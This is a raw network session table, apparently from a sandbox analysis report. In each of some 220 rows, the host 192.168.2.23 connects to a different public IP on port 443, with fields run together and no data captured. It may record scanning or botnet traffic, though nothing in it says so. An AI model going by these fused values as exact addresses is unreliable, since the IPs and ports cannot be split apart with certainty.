                                                24126192.168.2.2335134212.213.84.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24127192.168.2.2333106213.110.160.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24128192.168.2.234190092.182.163.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24129192.168.2.234118292.215.27.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24130192.168.2.235581099.89.58.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24131192.168.2.235903485.40.166.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24132192.168.2.235554860.105.9.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24133192.168.2.235232239.169.172.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24134192.168.2.235202680.216.112.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24135192.168.2.2343512203.51.185.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24136192.168.2.2346376203.179.103.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24137192.168.2.235555496.73.132.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24138192.168.2.2337940208.237.16.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24139192.168.2.235761274.210.181.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24140192.168.2.2353540220.240.123.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24141192.168.2.2337146199.72.34.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24142192.168.2.2340512186.74.53.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24143192.168.2.235413619.201.178.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24144192.168.2.2345616183.52.59.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24145192.168.2.2352558204.63.145.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24146192.168.2.234934281.200.83.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24147192.168.2.23599161.171.94.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24148192.168.2.235915082.69.194.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24149192.168.2.234866025.21.171.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24150192.168.2.2337904151.124.12.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24151192.168.2.235527460.143.247.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24152192.168.2.2354892117.220.137.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24153192.168.2.2353892174.52.101.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24154192.168.2.233480642.159.127.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24155192.168.2.2360806120.66.149.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24156192.168.2.236035671.71.61.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24157192.168.2.233893651.77.122.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24158192.168.2.2341804194.231.67.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24159192.168.2.2351318129.72.98.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24160192.168.2.23502468.19.71.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24161192.168.2.235239449.219.243.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24162192.168.2.233735048.99.170.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24163192.168.2.235673646.88.246.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24164192.168.2.2344300148.180.214.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24165192.168.2.2341732113.132.128.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24166192.168.2.2339000212.238.230.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24167192.168.2.2350950161.255.199.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24168192.168.2.2337940137.153.93.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24169192.168.2.2353042176.214.167.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24170192.168.2.23328261.141.195.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24171192.168.2.2355110220.184.242.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24172192.168.2.23490021.97.232.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24173192.168.2.235600495.229.45.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24174192.168.2.2359582165.108.104.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24175192.168.2.2346178158.116.2.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24176192.168.2.234019642.151.127.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24177192.168.2.2334092199.185.119.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24178192.168.2.233994077.98.125.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24179192.168.2.234613642.43.33.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24180192.168.2.2358852123.179.233.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24181192.168.2.2334988126.176.191.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24182192.168.2.235955647.44.195.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24183192.168.2.2351422180.23.26.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24184192.168.2.235759027.228.162.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24185192.168.2.2359520110.245.5.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24186192.168.2.2348480194.98.121.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24187192.168.2.2347588171.58.82.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24188192.168.2.2356944135.253.243.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24189192.168.2.2346616212.150.16.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24190192.168.2.235493650.104.151.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24191192.168.2.236055078.178.32.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24192192.168.2.2337180219.243.225.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24193192.168.2.2356614160.19.142.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24194192.168.2.2340052188.65.22.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24195192.168.2.234173050.124.110.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24196192.168.2.2335836142.1.205.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24197192.168.2.2340380138.11.103.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24198192.168.2.2341822179.168.172.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24199192.168.2.2347650211.39.5.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24200192.168.2.234127695.166.19.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24201192.168.2.235007484.109.155.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24202192.168.2.234202671.212.16.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24203192.168.2.2335170139.20.94.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24204192.168.2.234675475.2.24.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24205192.168.2.233447684.178.94.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24206192.168.2.233902234.17.28.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24207192.168.2.2346524206.55.121.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24208192.168.2.234259451.221.59.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24209192.168.2.2345616170.244.13.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24210192.168.2.2349906122.240.20.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24211192.168.2.2354234172.220.254.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24212192.168.2.234705449.112.37.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24213192.168.2.23398208.33.43.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24214192.168.2.236005692.18.65.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24215192.168.2.2335228135.43.218.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24216192.168.2.234352662.76.93.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24217192.168.2.2353298184.186.163.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24218192.168.2.2357918116.60.63.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24219192.168.2.235538851.185.43.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24220192.168.2.234273477.25.215.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24221192.168.2.2342662177.186.176.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24222192.168.2.2355608159.133.234.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24223192.168.2.235009232.184.56.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24224192.168.2.2344572209.249.116.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24225192.168.2.2340238156.46.88.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24226192.168.2.2333524207.34.89.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24227192.168.2.234365079.45.213.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24228192.168.2.234214867.240.220.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24229192.168.2.234334665.20.3.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24230192.168.2.2360762193.115.151.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24231192.168.2.233396872.211.40.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24232192.168.2.2355390116.202.168.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24233192.168.2.2354990141.225.137.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24234192.168.2.235792849.93.38.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24235192.168.2.2359332105.117.184.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24236192.168.2.23583382.30.168.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24237192.168.2.2352150193.56.125.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24238192.168.2.233860637.68.253.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24239192.168.2.234486276.198.24.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24240192.168.2.2349106102.79.252.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24241192.168.2.233357647.229.44.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24242192.168.2.235868231.20.34.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24243192.168.2.234641661.66.186.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24244192.168.2.2337192171.63.113.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24245192.168.2.2338206102.118.150.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24246192.168.2.234205037.153.60.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24247192.168.2.2339794165.204.128.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24248192.168.2.2341632196.36.191.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24249192.168.2.2348144169.22.22.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24250192.168.2.2358124205.177.93.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24251192.168.2.2347698197.2.252.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24252192.168.2.2338104152.119.68.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24253192.168.2.234007897.206.58.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24254192.168.2.234240037.2.17.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24255192.168.2.234500276.195.188.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24256192.168.2.2351936124.66.162.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24257192.168.2.234694068.75.152.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24258192.168.2.235130627.180.101.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24259192.168.2.2351276102.20.64.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24260192.168.2.23421962.226.109.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24261192.168.2.235014266.173.194.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24262192.168.2.235707069.193.207.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24263192.168.2.2340286123.165.43.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24264192.168.2.2340650209.113.119.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24265192.168.2.2354874165.225.245.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24266192.168.2.235922861.67.245.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24267192.168.2.2359804101.211.221.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24268192.168.2.2340838163.119.170.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24269192.168.2.2338118113.35.164.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24270192.168.2.234421668.166.231.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24271192.168.2.2349756181.227.6.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24272192.168.2.2359494194.103.52.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24273192.168.2.2351860155.253.68.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24274192.168.2.2337792168.220.183.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24275192.168.2.2336874159.163.5.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24276192.168.2.233861248.148.9.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24277192.168.2.234761698.210.14.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24278192.168.2.235800868.99.185.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24279192.168.2.2340384119.161.90.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24280192.168.2.233902260.234.198.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24281192.168.2.2339436201.126.6.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24282192.168.2.235454440.106.242.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24283192.168.2.234949420.233.141.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24284192.168.2.236027690.178.6.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24285192.168.2.2348958102.147.212.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24286192.168.2.2346514222.219.107.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24287192.168.2.234535468.70.76.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24288192.168.2.2352388138.69.107.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24289192.168.2.2358782217.111.193.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24290192.168.2.2342332130.46.42.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24291192.168.2.2337674136.106.26.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24292192.168.2.234821831.126.201.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24293192.168.2.234081881.179.0.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24294192.168.2.2351616196.216.36.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24295192.168.2.234014449.190.239.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24296192.168.2.234425076.92.21.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24297192.168.2.235440047.225.0.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24298192.168.2.2350626103.207.236.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24299192.168.2.2341678155.224.29.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24300192.168.2.235748812.197.250.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24301192.168.2.233575896.40.204.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24302192.168.2.2350896186.182.52.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24303192.168.2.235093695.237.223.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24304192.168.2.2346078125.148.163.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24305192.168.2.235013637.91.52.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24306192.168.2.2337160166.247.108.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24307192.168.2.2359478107.27.25.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24308192.168.2.23549902.115.142.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24309192.168.2.234155873.37.113.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24310192.168.2.2338680159.21.13.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24311192.168.2.2333530200.19.97.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24312192.168.2.234476896.168.114.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24313192.168.2.233970870.165.219.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24314192.168.2.233604672.220.92.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24315192.168.2.235284838.90.39.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24316192.168.2.2348016138.238.124.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24317192.168.2.2345340178.2.48.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24318192.168.2.233782067.99.151.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24319192.168.2.2338910220.245.195.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24320192.168.2.235771681.179.124.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24321192.168.2.2355802166.78.163.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24322192.168.2.235226235.131.124.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24323192.168.2.23558228.156.190.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24324192.168.2.235698420.196.5.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24325192.168.2.2353566203.20.70.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24326192.168.2.2349432185.129.221.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24327192.168.2.2360456137.64.190.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24328192.168.2.233555435.151.17.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24329192.168.2.233997281.67.221.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24330192.168.2.2339946216.234.66.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24331192.168.2.233435464.43.142.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24332192.168.2.2346020220.253.94.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24333192.168.2.235322498.84.102.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24334192.168.2.233605647.168.215.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24335192.168.2.2356450209.253.22.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24336192.168.2.2333886133.24.248.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24337192.168.2.234710692.244.62.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24338192.168.2.23517662.67.105.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24339192.168.2.236037898.177.59.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24340192.168.2.2352252156.252.167.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24341192.168.2.235027636.238.121.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24342192.168.2.2353782163.242.182.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24343192.168.2.234877824.61.166.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24344192.168.2.234192684.221.249.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24345192.168.2.234196470.228.220.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24346192.168.2.235091252.27.145.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24347192.168.2.2359246155.106.8.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
